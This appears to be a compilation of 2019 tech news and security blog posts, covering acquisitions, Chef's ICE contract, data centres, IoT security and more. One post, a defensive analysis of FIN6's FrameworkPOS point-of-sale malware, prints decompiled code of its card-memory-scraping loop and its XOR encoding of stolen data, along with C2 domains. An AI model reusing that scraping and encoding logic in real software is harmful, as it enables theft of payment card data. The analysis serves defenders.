Facebook has acquired Servicefriend, which builds ‘hybrid’ chatbots, for Calibra customer service

As Facebook prepares to launch its new cryptocurrency Libra in 2020, it’s putting the pieces in place to help it run. In one of the latest developments, it has acquired Servicefriend, a startup that built bots — chat clients for messaging apps based on artificial intelligence — to help customer service teams, TechCrunch has confirmed.

The news was first reported in Israel, where Servicefriend is based, after one of its investors, Roberto Singler, alerted local publication The Marker about the deal. We reached out to Ido Arad, one of the co-founders of the company, who referred our questions to a team at Facebook. Facebook then confirmed the acquisition with an Apple-like non-specific statement:

“We acquire smaller tech companies from time to time. We don’t always discuss our plans,” a Facebook spokesperson said.

Several people, including Arad, his co-founder Shahar Ben Ami, and at least one other indicate that they now work at Facebook within the Calibra digital wallet group on their LinkedIn profiles. Their jobs at the social network started this month, meaning this acquisition closed in recent weeks. (Several others indicate that they are still at Servicefriend, meaning they too may have likely made the move as well.)

Although Facebook isn’t specifying what they will be working on, the most obvious area will be in building a bot — or more likely, a network of bots — for the customer service layer for the Calibra digital wallet that Facebook is developing.

Facebook’s plan is to build a range of financial services for people to use Calibra to pay out and receive Libra — for example, to send money to contacts, pay bills, top up their phones, buy things and more.

It remains to be seen just how much people will trust Facebook as a provider of all these. So that is where having “human” and accessible customer service experience will be essential.

“We are here for you,” Calibra notes on its welcome page, where it promises 24-7 support in WhatsApp and Messenger for its users.

Screenshot 2019 09 21 at 23.25.18

Servicefriend has worked on Facebook’s platform in the past: specifically it built “hybrid” bots for Messenger for companies to use to complement teams of humans, to better scale their services on messaging platforms. In one Messenger bot that Servicefriend built for Globe Telecom in the Philippines, it noted that the hybrid bot was able to bring the “agent hours” down to under 20 hours for each 1,000 customer interactions.

Bots have been a relatively problematic area for Facebook. The company launched a personal assistant called M in 2015, and then bots that let users talk to businesses in 2016 on Messenger, with quite some fanfare, although the reality was that nothing really worked as well as promised, and in some cases worked significantly worse than whatever services they aimed to replace.

While AI-based assistants such as Alexa have become synonymous with how a computer can carry on a conversation and provide information to humans, the consensus around bots these days is that the most workable way forward is to build services that complement, rather than completely replace, teams.

For Facebook, getting its customer service on Calibra right can help it build and expand its credibility (note: another area where Servicefriend has build services is in using customer service as a marketing channel). Getting it wrong could mean issues not just with customers, but with partners and possibly regulators.

Chef CEO says he’ll continue to work with ICE in spite of protests

Yesterday, software development tool maker Chef found itself in the middle of a firestorm after a Tweet called them out for doing business with DHS/ICE. Eventually it led to an influential open-source developer removing a couple of key pieces of software from the project, bringing down some parts of Chef’s commercial business.

Chef intends to fulfill its contract with ICE, in spite of calls to cancel it. In a blog post published this morning, Chef CEO Barry Crist defended the decision. “I do not believe that it is appropriate, practical, or within our mission to examine specific government projects with the purpose of selecting which U.S. agencies we should or should not do business.”

He stood by the company’s decision this afternoon in an interview with TechCrunch, while acknowledging that it was a difficult and emotional decision for everyone involved. “For some portion of the community, and some portion of our company, this is a super, super-charged lightning rod, and this has been very difficult. It’s something that we spent a lot of time on, and I want to represent that there are portions of [our company] that do not agree with this, but I as a leader of the company, along with the executive team, made a decision that we would honor the contracts and those relationships that were formed and work with them over time,” he said.

He added, “I think our challenge as leadership right now is how do we collectively navigate through times like this, and through emotionally-charged issues like the ICE contract.”

The deal with ICE, which is a $95,000-a-year contract for software development tools, dates back to the Obama administration when the then DHS CIO wanted to move the department toward more modern agile/DevOps development workflows, according Christ.

He said for people who might think it’s a purely economic decision, the money represents a fraction of the company’s more than $50 million annual revenue (according to Crunchbase data), but he says it’s about a long-term business arrangement with the government that transcends individual administration policies. “It’s not about the $100,000, it’s about decisions we’ve made to engage the government. And I appreciate that not everyone in our world feels the same way or would make that same decision, but that’s the decision that we made as a leadership team,” Crist said.

Shortly after word of Chef’s ICE contract appeared on Twitter, according to a report in The Register, former Chef employee Seth Vargo removed a couple of key pieces of open-source software from the repository, telling The Register that “software engineers have to operate by some kind of moral compass.” This move brought down part of Chef’s commercial software and it took them 24 hours to get those services fully restored, according to Chef CTO Corey Scobie.

Crist says he wants to be clear that his decision does not mean he supports current ICE policies. “I certainly don’t want to be viewed as I’m taking a strong stand in support of ICE. What we’re taking a strong stand on is our consistency with working with our customers, and again, our work with DHS  started in the previous administration on things that we feel very good about,” he said.

The Good, the Bad and the Ugly in Cybersecurity – Week 38

Image of The Good, The Bad & The Ugly in CyberSecurity

The Good

“We have to get over our fear of embracing external experts to help us be secure. We are still carrying cybersecurity procedures from the 1990s.” -Will Roper, Assistant Secretary of the Air Force for acquisition

The US Air Force is quickly changing its philosophy (and reaping great rewards by doing so) by inviting hackers to crack core operational systems and weapons platforms. Initial success was established earlier this year when hackers discovered major mission-critical vulnerabilities in the high-profile F-15 Fighter Jet. This was the first time any outside talent was invited to crack into the TADS and other systems of the aircraft.  The immense success of that event, as well as the success it has found in its bug bounty program and Aviation Village at DefCon, brings us to today’s “The Good:” next up is a satellite in orbit, and the ability for hackers to attack the bird or the ground station control systems, in order to uncover vulnerabilities that an otherwise closed development lifecycle simply won’t.  

The Bad

A report by Marsh and Microsoft, the “2019 Global Cyber Risk Perception Survey,” brings mostly Bad News: Of all business risks, cyber risks outrank all others by 20%, with 79% of respondents saying it is their top risk, even over today’s economic uncertainty during a trade war and inverted yield curves. That’s Bad…if cybersecurity solutions were effective, it would not be a top concern.  But worse, the report shows that confidence in three critical areas of “cyber resilience” declined: 18% said they had no confidence in understanding and assessing cyber risks (up from 9% two years ago), and 19% of leaders had no confidence in preventing cyber threats (up 7% from before). Worst of all, 2 out of 10 respondents said they had no confidence in their organization’s ability to respond and recover from cyber events like ransomware, fast-moving worms, sensitive data breaches, etc.

Question: Of the following business threats, please rank the top 5 that are the biggest concerns to your organization:

 Of the following business threats, please rank the top 5 that are the biggest concerns to your organization.

Simply put:  Because legacy controls and a focus on ‘resilience’ over prevention have not been working these last 4-5 years (getting worse in fact), the C-suite is more worried than ever about cyber risk to the business, life/safety, brand/reputation, and mission.  

The Ugly

The same folks that sponsored The Bad were broken by themselves: Microsoft. This time we have a Microsoft patch that broke the ability for Microsoft to perform manual or scheduled Microsoft Defender scans on the Microsoft OS.  But more ironic than that? The patch was needed because Microsoft System File Checker (SFC), which had been broken since early this summer, was flagging internal Microsoft Windows PowerShell files within Microsoft Defender as malformed.  Some in the community point out that Microsoft keeps breaking things when they try to fix them…but they are missing the point: Using Microsoft components that depend on Microsoft components to secure Microsoft components is like asking your foot doctor to perform brain surgery using his foot, upon himself.  It’s never been a good idea. It never will be, and the manifestations of this very bad idea will play out in real life indefinitely, and by design. This is not a philosophical conundrum, this is just the entropy of complex, self-referencing, self-authored, self-conflicted software playing out as it must.

 


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Google is investing $3.3B to build clean data centers in Europe

Google announced today that it was investing 3 billion euro (approximately $3.3 billion USD) to expand its data center presence in Europe. What’s more, the company pledged the data centers would be environmentally friendly.

This new investment is in addition to the $7 billion the company has invested since 2007 in the EU, but today’s announcement was focused on Google’s commitment to building data centers running on clean energy, as much as the data centers themselves.

In a blog post announcing the new investment, CEO Sundar Pichai, made it clear that the company was focusing on running these data centers on carbon-free fuels, pointing out that he was in Finland today to discuss building sustainable economic development in conjunction with a carbon-free future with prime minister Antti Rinne.

Of the 3 billion Euros, the company plans to spend, it will invest 600 million to expand its presence in Hamina, Finland, which he wrote “serves as a model of sustainability and energy efficiency for all of our data centers.” Further, the company already announced 18 new renewable energy deals earlier this week, which encompass a total of 1,600-megawatts in the US, South America and Europe.

In the blog post, Pichai outlined how the new data center projects in Europe would include some of these previously announced projects:

Today I’m announcing that nearly half of the megawatts produced will be here in Europe, through the launch of 10 renewable energy projects. These agreements will spur the construction of more than 1 billion euros in new energy infrastructure in the EU, ranging from a new offshore wind project in Belgium, to five solar energy projects in Denmark, and two wind energy projects in Sweden. In Finland, we are committing to two new wind energy projects that will more than double our renewable energy capacity in the country, and ensure we continue to match almost all of the electricity consumption at our Finnish data center with local carbon-free sources, even as we grow our operations.

The company is also helping by investing in new skills training, so people can have the tools to be able to handle the new types of jobs these data centers and other high tech jobs will require. The company claims it has previously trained 5 million people in Europe for free in crucial digital skills, and recently opened a Google skills hub in Helsinki.

It’s obviously not a coincidence that company is making an announcement related to clean energy on Global Climate Strike Day, a day when people from around the world are walking out of schools and off their jobs to encourage world leaders and businesses to take action on the climate crisis. Google is attempting to answer the call with these announcements.

Vianai emerges with $50M seed and a mission to simplify machine learning tech

You don’t see a startup get a $50 million seed round all that often, but such was the case with Vianai, an early stage startup launched by Vishal Sikka, former Infosys managing director and SAP executive. The company launched recently with a big check and a vision to transform machine learning.

Just this week, the startup had a coming out party at Oracle Open World where Sikka delivered one of the keynotes and demoed the product for attendees. Over the last couple of years, since he left Infosys, Sikka has been thinking about the impact of AI and machine learning on society and the way it is being delivered today. He didn’t much like what he saw.

It’s worth noting that Sikka got his Ph.D. from Stanford with a specialty in AI in 1996, so this isn’t something that’s new to him. What’s changed, as he points out, is the growing compute power and increasing amounts of data, all fueling the current AI push inside business. What he saw when he began exploring how companies are implementing AI and machine learning today, was a lot of complex tooling, which in his view, was far more complex than it needed to be.

He saw dense Jupyter notebooks filled with code. He said that if you looked at a typical machine learning model, and stripped away all of the code, what you found was a series of mathematical expressions underlying the model. He had a vision of making that model-building more about the math, while building a highly visual data science platform from the ground up.

The company has been iterating on a solution over the last year with two core principles in mind: explorability and explainability, which involves interacting with the data and presenting it in a way that helps the user attain their goal faster than the current crop of model-building tools.

“It is about making the system reactive to what the user is doing, making it completely explorable, while making it possible for the developer to experiment with what’s happening in a in a way that is that is incredibly easy. To make it explainable, means being able to go back and forth with the data and the model, using the model to understand the phenomenon that you’re trying to capture in the data,” Sikka told TechCrunch.

He says the tool isn’t just aimed at data scientists, it’s about business users and the data scientists sitting down together and iterating together to get the answers they are seeking, whether it’s finding a way to reduce user churn or discover fraud. These models do not live in a data science vacuum. They all have a business purpose, and he believes the only way to be successful with AI in the enterprise is to have both business users and data scientists sitting together at the same table working with the software to solve a specific problem, while taking advantage of one another’s expertise.

For Sikka, this means refining the actual problem you are trying to solve. “AI is about problem solving, but before you do the problem solving, there is also a [challenge around] finding and articulating a business problem that is relevant to businesses and that has a value to the organization,” he said.

He is very clear, that he isn’t looking to replace humans, but instead wants to use AI to augment human intelligence to solve actual human problems. He points out that this product is not automated machine learning (AutoML), which he considers a deeply flawed idea. “We are not here to automate the jobs of data science practitioners. We are here to augment them,” he said.

As for that massive seed round, Sikka knew it would take a big investment to build a vision like this, and with his reputation and connections, he felt it would be better to get one big investment up front, and he could concentrate on building the product and the company. He says that he was fortunate enough to have investors who believe in the vision, even though as he says, no early business plan survives the test of reality. He didn’t name specific investors, only referring to friends and wealthy and famous people institutions. A company spokesperson reiterated they were not revealing a list of investors at this time.

For now, the company has a new product and plenty of money in the bank to get to profitability, which he states is his ultimate goal. Sikka could have taken a job running a large organization, but like many startup founders, he saw a problem, and he had an idea how to solve it. That was a challenge he couldn’t resist pursuing.

FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals

The Zero2Hero malware course continues with Vitali Kremez diving into the FIN6 “FrameworkPOS”, targeting payment card data from Point-of-Sale (POS) or eCommerce systems.

Point-of-Sale (POS) malware remain to be an active threat for financial cybercrime. POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. Some of the most prolific POS malware lately include the “AlinaPOS”, “GlitchPOS”, and “FrameworkPOS”.

After the credit cards are first scanned in real time, the personal account number (PAN) and accompanying data sits in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. During that time, the point-of-sale malware opens up the process memory searching for elements related to credit card information.

The FrameworkPOS malware and related variants are linked to the high-profile merchant breaches in the past including the “MozartPOS” variant involved in the Home Depot intrusion. 

POS malware becomes relevant during the Fall shopping season (especially Black Friday) targeting various businesses dealing with live credit card transactions.

Click here to watch the full episode on Dissecting FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals

“FrameworkPOS” Malware Internals

One of the more interesting POS malware is called “FrameworkPOS” variants (including the ones dubbed “GratefulPOS” and “MozartPOS”). This malware most recently was internally named as “psemonitor_x64.dll.” FrameworkPOS, also known as TRINITY, was previously linked to the financially motivated hacking collective called FIN6.

 Some of the new FIN6 FrameworkPSS malware variants were spotted by revealing that the group utilizes the 64-bit malware variant with two export functions “workerIntstance” and “debugPoint”.

FIN6 FrameworkPSS malware

Notably, FrameworkPOS malware appears to continue to have low detection ratio according to the detections displayed on VirusTotal (as of September 18, 2019, only 9 out of 66 antivirus engines only treat the malware as suspicious). 

For the malware analysis purposes, we also analyze the earlier FrameworkPOS version with the purported “grp1” campaign identifier and contains debug Track 2 data presumably for testing purposes.

The FrameworkPOS main function flow is as follows as psuedo-coded in C++ from creating the “caller” thread to build out the communication protocol and resolve necessary host information.

The excerpt of the main malware functionality is as follows:

    CreateThread(0, 0, (LPTHREAD_START_ROUTINE)caller, 0, 0, 0);

    while ( 1 )
    {
      time(&v11);
      hSnapshot = CreateToolhelp32Snapshot(2u, 0);
      if ( hSnapshot == (HANDLE)-1 )
        return 0;
      pe.dwSize = 296;

      if ( !Process32First(hSnapshot, &pe) )
        break;
      do
      {
        v8 = 0;
        for ( j = 0; j < 0x14; ++j )
        {
          if ( !strcmp(pe.szExeFile, &aWininit_exe[24 * j]) || strstr(byte_592010, pe.szExeFile) )
          {
            v8 = 1;
            break;
          }
        }
        if ( !v8 )
        {
          if ( pe.th32ProcessID )
          {
            dwProcessId = pe.th32ProcessID;
            v14 = 1;
            dword_592514 = 0;
            byte_59136B = 0;
            v89 = check_virtualQuery_ex(pe.th32ProcessID, 1);
            if ( v89 )
            {
              scan_memoryfor_card((int)v89);
              free((int)v89);
              _sleep(200u);
            }
          }
        }
      }
      while ( Process32Next(hSnapshot, &pe) );
      if ( dword_592410 > 0 )
        _sleep(10000u s);
      CloseHandle(hSnapshot);
      time(&v15);
      v15 -= v11;
      localtime(&v15);
    }

The malware proceeds to blacklist certain processes such as “wininit.exe” when approaches memory scraping in order to speed necessary card scan logic.

Credit Card Scraping Logic & Luhn Algorithm

The malware also validates the card information by running the Luhn algorithm for any purported track data that does not begin with digits “4” (VISA), “5” (Mastercard), “6” (Discover), “34″ (AMEX), “37” (AMEX), “36” (Diner’s Club), and “300-305” (Diner’s Club).

FIN6

The x64 malware version also contains an altered “greedier” version of the Track1/Track2 scanner logic focusing less on static card prefixes and service codes but for any data that looks like Track1/Track2.

FIN6 x64 malware version

FrameworkPOS Data Encoding: XOR & Obfuscation

Throughout its execution, the malware builds some notable strings via xoring the byte section in the loop *(&byte_memory ++) ^= 0x4Dh (via sequence of mov, xor, shl, movsx, and shl calls). Oftentimes, malware coders build string paths to bypass some static anti-virus detection.

FIN6 bypass some static anti-virus detection

Notably, the FrameworkPOS malware obfuscates its stolen data via the hardcoded string and then XOR byte key of “AA” to strings as follows and converts it into hexadecimals adding to snprintf API call:

size_t __cdecl enc_func(char *a1, int a2)
{
  size_t result; 
  unsigned int i;
  for ( len_enc = 0; ; ++len_enc )
  {
    result = strlen(a1);
    if ( len_enc >= result )
      break;
    for ( i = 0; i < 69; ++i )
    {
      if ( (unsigned __int8)a1[len_enc] == byte_42E000[i] )
      {
        a1[len_enc] = byte_42E048[i];
        break;
      }
    }
    a1[len_enc] ^= AA_key;
    _snprintf((char *)(a2 + 2 * len_enc), 2u, "%.2x", (unsigned __int8)a1[len_enc]);
  }
  return result;
}

The XOR key function location is as follows:
-------        --------         
Address        Function                                 
-------        --------             
.text:004030DB notice_write_func  
.text:00403847 memory_parser 
.text:00403873 memory_parser 
.text:004039DE memory_parser     
.text:00406C43 computer_name_gen

Command & Control (C2) Protocol

Notably, the FrameworkPOS malware variant leverages hex with 0xAA byte XOR encoding for exfiltrated data with the ping request with the domain name system (DNS) exfiltration protocol.

Credit: @malz_intel

Indicators of Compromise (IOCs):

FrameworkPOS x86 SHA-256: 81cea9fe7cfe36e9f0f53489411ec10ddd5780dc1813ab19d26d2b7724ff3b38

FrameworkPOS x64 SHA-256: 7a207137e7b234e680116aa071f049c8472e4fb5990a38dab264d0a4cde126df

C2:

ns[.]akamai1811[.]com

ns[.]a193-45-3-47-deploy-akamaitechnologies[.]com


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

New Relic launches platform for developers to build custom apps

When Salesforce launched Force.com in 2007 as a place for developers to build applications on top of Salesforce, it was a pivotal moment for the concept of SaaS platforms. Since then, it’s been said that every enterprise SaaS company wants to be a platform play. Today, New Relic achieved that goal when it announced the New Relic One Observability Platform at the company’s FutureStack conference in New York City.

Company co-founder and CEO Lew Cirne explained that in order to be a platform, by definition, it is something that other people can build software on. “What we are shipping is a set of capabilities to enable our customers and partners to build their own observability applications on the very same platform that we’ve built our product,” Cirne told TechCrunch.

He sees these third-party developers building applications to enable additional innovations on top of the New Relic platform that perhaps New Relic’s engineers couldn’t because of time and resource constraints. “There are so many use cases for this data, far more than the engineers that we have at our company could ever do, but a community of people who can do this together can totally unlock the power of this data,” Cirne said.

Like many platform companies, New Relic found that as it expanded its own offering, it required a platform for its developers to access a common set of services to build these additional offerings, and as they built out this platform, it made it possible to open it up to external developers to access the same set of services as the New Relic engineering team.

“What we have is metrics, logs, events and traces coming from our customers’ digital software. So they have access to all that data in real time to build applications, measure the health of their digital business and build applications on top of that. Just as Force.com was the thing that really transformed Salesforce as a company into being a strategic vendor, we think the same thing will happen for us with what we’re offering,” he said.

As a proof point for the platform, the company is releasing a dozen open-source tools built on top of the New Relic platform today in conjunction with the announcement. One example is an application to help identify where companies could be over-spending on their AWS bills. “We’re actually finding 30-40% savings opportunities for them where they’re provisioning larger servers than they need for the workload. Based on the data that we’re analyzing, we’re recommending what the right size deployment should be,” Cirne said.

The New Relic One Observability Platform and the 12 free apps will be available starting today.

Quilt Data launches from stealth with free portal to access petabytes of public data

Quilt Data‘s founders, Kevin Moore and Aneesh Karve, have been hard at work for the last four years building a platform to search for data quickly across vast repositories on AWS S3 storage. The idea is to give data scientists a way to find data in S3 buckets, then package that data in forms that a business can use. Today, the company launched out of stealth with a free data search portal that not only proves what they can do, but also provides valuable access to 3.7 petabytes of public data across 23 S3 repositories.

The public data repository includes publicly available Amazon review data along with satellite images and other high-value public information. The product works like any search engine, where you enter a query, but instead of searching the web or an enterprise repository, it finds the results in S3 storage on AWS.

The results not only include the data you are looking for, it also includes all of the information around the data, such as Jupyter notebooks, the standard workspace that data scientists use to build machine learning models. Data scientists can then use this as the basis for building their own machine learning models.

The public data, which includes more than 10 billion objects, is a resource that data scientists should greatly appreciate it, but Quilt Data is offering access to this data out of more than pure altruism. It’s doing so because it wants to show what the platform is capable of, and in the process hopes to get companies to use the commercial version of the product.

Screen Shot 2019 09 16 at 2.31.53 PM

Quilt Data search results with data about the data found (Image: Quilt Data)

Customers can try Quilt Data for free or subscribe to the product in the Amazon Marketplace. The company charges a flat rate of $550 per month for each S3 bucket. It also offers an enterprise version with priority support, custom features and education and on-boarding for $999 per month for each S3 bucket.

The company was founded in 2015 and was a member of the Y Combinator Summer 2017 cohort. The company has received $4.2 million in seed money so far from Y Combinator, Vertex Ventures, Fuel Capital and Streamlined Ventures, along with other unnamed investors.

Yes, Your IoT Needs Security, Too

Gartner predicted that by the end of 2020 about 25% of attacks on enterprises will involve IoT devices. But investment in IoT security will not measure to this risk level and is only expected to account for 10% security spending, as organizations will likely prefer usability over security.  The characteristics of traditional IoT security solutions will also hamper the adoption, as these are usually cumbersome, expensive and don’t scale well.

IoT Devices Add to the Existing Number of Endpoints

If predictions by Gartner about future trends seems vague, instead look at the recent warning made by Microsoft about Russian Hackers breaching secured networks using simple IoT devices. And this is just the beginning. Today, there are 27 billion IoT devices. This number is expected to increase to 125 billion by just 2030. 

Many of these IoT devices will find their way into enterprises and onto enterprise networks, in the form of smart assistances (Alexa), IP cameras, smart thermostats and other devices, all aimed at increasing convenience and productivity. However, these devices also significantly increase the organizations’ attack surface, adding to the burden of securing the most common IT devices – the endpoint. 

The Challenges of Securing IoT devices in the Corporate Environment

IoT devices and endpoints are similar in some ways – they are connected to the enterprise network, they have an IP address, and some computing power (depending on the type and functionality). But unlike endpoints, IoT devices are usually not deployed in the same planned and organized manner, they are not built with security in mind, and they cannot be installed with proper endpoint protection solutions due to their limited nature (memory size, type of OS, computing power).

Often, these “smart” devices are “rogue” or “shadow IT” devices, which means they are brought from outside the organization without the IT department’s knowledge or supervision, and are connected to the network by Wi-Fi, Bluetooth or other communication protocol, which makes them “transparent” to network monitoring tools. So the first challenge is to discover all these devices. The second challenge is to enforce organizational security and privacy policies regarding these devices (which is impossible to do if you haven’t even detected them). Last but not least, the organization needs to monitor these devices, identify suspicious behavior and then respond if such activity is detected.  

Existing Solutions fall short

Existing security products on the market try to tackle these challenges either by monitoring the traffic or by installing software agents on the devices themselves. The first approach usually requires adding physical appliances to the network and directing traffic there. Other products require capturing the traffic and uploading the logs to a server for processing. Both of these methods are difficult to implement and don’t scale well for organizations with multiple sites and network types. Deploying software agents on the devices themselves is even more impractical – it is possible only for very limited types of devices (security cameras), is not scalable, and does not cater for the “shadow” element in which users bring unsupervised devices into the network.  

SentinelOne solution – “IoT discovery and enforcement”

Aiming to increase the security of enterprises from the threat of IoT devices, SentinelOne took a different path: leveraging existing endpoint security agents as sensors, effectively turning every protected endpoint into a network detection device capable of identifying and controlling every IoT and connected device on a network. Utilizing endpoint security agents obviate the need for installing additional equipment, hence facilitating deployment. Once in use, the Ranger IoT security module identifies all the connected devices and presents them to the security analysts. Every new device connected to the network is identified and added to the monitored devices’ list.

Since it’s not enough to simply know you have a device on your network, the system fingerprints the devices according to operating system and the device’s role. The devices are then presented according to categories (printers, mobile devices, Linux servers, and so on). Fingerprinting also allows alerting when a device is unmanaged or compromised as it will act differently than other devices of the same category. 

Providing security teams with complete visibility, categorization and alerting regarding rogue devices and vulnerabilities, all from the same management console and without having to install addition systems, is the best way to ensure that enterprises proactively prepare themselves to the imminent threat presented by IoT devices.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Salesforce is building an app to gauge a company’s sustainability progress

Salesforce has always tried to be a socially responsible company, encouraging employees to work in the community, giving 1% of its profits to different causes and building and productizing the 1-1-1 philanthropic model. The company now wants to help other organizations be more sustainable to reduce their carbon footprint, and today it announced it is working on a product to help.

Patrick Flynn, VP of sustainability at Salesforce, says that it sees sustainability as a key issue, and one that requires action right now. The question was how Salesforce could help. As a highly successful software company, it decided to put that particular set of skills to work on the problem.

“We’ve been thinking about how can Salesforce really take action in the face of climate change. Climate change is the biggest, most important and most complex challenge humans have ever faced, and we know right now, every individual, every company needs to step forward and do everything it can,” Flynn told TechCrunch.

And to that end, the company is developing the Salesforce Sustainability Cloud, to help track a company’s sustainability efforts. The tool should look familiar to Salesforce customers, but instead of tracking customers or sales, this tool tracks carbon emissions, renewable energy usage and how well a company is meeting its sustainability goals.

Dashboards

Image: Salesforce

The tool works with internal data and third-party data as needed, and is subject to both an internal audit by the Sustainability team and third-party organizations to be sure that Salesforce (and Sustainability Cloud customers) are meeting their goals.

Salesforce has been using this product internally to measure its own sustainability efforts, which Flynn leads. “We use the product to measure our footprint across all sorts of different aspects of our operations from data centers, public cloud, real estate — and we work with third-party providers everywhere we can to have them make their operations cleaner, and more powered by renewable energy and less carbon intensive,” he said. When there is carbon generated, the company uses carbon offsets to finance sustainability projects such as clean cookstoves or helping preserve the Amazon rainforest.

Flynn says increasingly the investor community is looking for proof that companies are building a real, verifiable sustainability program, and the Sustainability Cloud is an effort to provide that information both for Salesforce and for other companies that are in a similar position.

The product is in beta now and is expected to be ready next year. Flynn could not say how much they plan to charge for this service, but he said the goal of the product is positive social impact.

Hear Salesforce chairman, co-founder and CEO Marc Benioff discuss business as the greatest platform for change at Disrupt SF October 2-4. Get your passes to the biggest startup show around.